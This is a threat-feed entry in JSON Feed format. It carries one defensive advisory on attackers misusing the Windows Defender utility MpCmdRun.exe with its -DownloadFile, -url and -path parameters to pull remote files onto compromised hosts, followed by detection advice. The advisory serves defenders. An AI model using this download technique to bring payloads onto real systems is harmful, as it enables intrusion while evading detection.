{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/mpcmdrun/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Defender"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","ingress-tool-transfer","windows","mpcmdrun"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are leveraging the built-in Windows Defender command-line utility, \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e, to download files from remote locations. This technique allows attackers to bypass traditional download restrictions and blend in with legitimate system activity. The \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e utility is normally used to manage Windows Defender settings and perform tasks such as signature updates and scans. However, its \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter can be abused to download arbitrary files from a specified URL. This activity was first publicly reported around September 2020. Defenders should monitor for unusual usage patterns of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e, especially those involving command-line arguments related to file downloads from external sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a target system through an unrelated vulnerability or existing compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e to download a file from a remote server. The command includes arguments like \u003ccode\u003e-DownloadFile\u003c/code\u003e, \u003ccode\u003e-url\u003c/code\u003e, and \u003ccode\u003e-path\u003c/code\u003e to specify the download location and save path.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to a location on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded file. This could be a malicious executable, a script, or a configuration file.\u003c/li\u003e\n\u003cli\u003eThe executed file performs further malicious actions on the system, such as establishing persistence, escalating privileges, or deploying additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system as a foothold to move laterally within the network, compromising other systems and resources.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their ultimate objective, such as data exfiltration, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to introduce arbitrary malicious code into the system, potentially leading to a wide range of adverse effects, including data theft, system compromise, and disruption of operations. While individual cases may be limited in scope, widespread exploitation could impact numerous organizations, resulting in significant financial losses and reputational damage. The use of a trusted system utility makes this technique harder to detect using traditional methods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMpCmdRun Remote File Download\u003c/code\u003e to your SIEM to detect the malicious use of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e for downloading files.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with command-line arguments to provide the necessary data for the Sigma rule to function.\u003c/li\u003e\n\u003cli\u003eReview historical process execution logs for instances of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e being used with the \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables downloaded by \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-mpcmdrun-remote-file-copy/","summary":"Attackers are abusing the Windows Defender MpCmdRun.exe utility to download remote files, potentially delivering malware or offensive tools into compromised systems.","title":"MpCmdRun.exe Used for Remote File Download","url":"https://feed.craftedsignal.io/briefs/2024-01-03-mpcmdrun-remote-file-copy/"}],"language":"en","title":"CraftedSignal Threat Feed — Mpcmdrun","version":"https://jsonfeed.org/version/1.1"}